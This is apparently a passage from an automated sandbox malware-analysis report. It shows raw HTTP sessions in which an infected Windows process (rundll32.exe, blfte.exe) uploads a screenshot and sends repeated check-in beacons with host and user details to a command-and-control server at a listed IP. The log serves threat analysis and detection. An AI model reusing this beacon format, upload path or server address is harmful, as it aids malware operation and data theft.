                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          350192.168.2.449959176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.137056112 CEST10691OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:06.237952948 CEST10694OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:06.238027096 CEST10697OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:06.239059925 CEST10700OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:06.240928888 CEST10703OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:06.241321087 CEST10705OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:06.241398096 CEST10708OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:06.241447926 CEST10714OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:06.241461992 CEST10716OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:06.241473913 CEST10719OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 23:00:06.340662003 CEST10733OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          351192.168.2.449960176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.225959063 CEST10692OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          352176.111.174.11480192.168.2.449960C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.331362009 CEST10719INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          353192.168.2.449961176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.537075996 CEST10879OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          354176.111.174.11480192.168.2.449961C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.640202999 CEST10907INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          355176.111.174.11480192.168.2.449959C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.647165060 CEST10908INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          356192.168.2.449963176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.853204012 CEST10908OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          357176.111.174.11480192.168.2.449963C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.957252979 CEST10909INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          358192.168.2.449964176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:07.159348965 CEST10909OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          359176.111.174.11480192.168.2.449964C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:07.257025957 CEST10910INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:07 GMT
